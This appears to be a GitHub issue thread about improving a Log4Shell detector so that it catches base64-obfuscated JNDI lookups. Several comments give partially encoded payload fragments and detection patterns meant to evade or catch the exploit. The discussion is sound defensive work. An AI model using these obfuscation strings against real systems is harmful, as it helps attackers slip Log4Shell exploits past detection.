Add pattern '${base64:JHtqbmRp'

Question

Add pattern '${base64:JHtqbmRp'

baonq-me opened this issue 3 years ago · 7 comments

I request to add pattern ${base64:JHtqbmRp which is evaluated to ${jndi. I think with the current algorithm, the detector can not detect these kind of patterns.

Ref
https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml#L40

Answer 1 · 2021-12-14T08:54:27.000Z

Oh, yes - from my own rule ... thanks

Answer 2 · 2021-12-14T08:55:56.000Z

Oh, no, it's already in there : https://github.com/Neo23x0/log4shell-detector/blob/main/log4shell-detector.py#L35

Answer 3 · 2021-12-14T13:03:41.000Z

Can i suggest that instead of looking for the string outright... a more foolproof way to handle the base64 is to actually do the decode. Because the issue is you can base64 encode any subset of the URI and combine it with other chars. So to handle this you could find all of the ${base64:} instances first, decode them, then run back through the detection.

Answer 4 · 2021-12-14T17:29:33.000Z

Could you explain why we would need more coverage with an example?
Which use isn't covered by ${base64:JHtqbmRp?

Answer 5 · 2021-12-14T17:41:53.000Z

You can do this as an example.. encode only "di"

${jn${base64:JZGk}://}

or this ... encode just the "d"

${jn${base64:ZA}i://}

or... any number of combinations of things that are part of the string

I have a PR #25 that adds the decoding

Answer 6 · 2021-12-14T19:39:41.000Z

Ah, I see - yes, good to cover that as well

Answer 7 · 2021-12-15T18:44:58.000Z

FYI, base64 isn't actually in a release yet, just in master, so these payloads shouldn’t work unless the target has chosen to add the lookup themselves.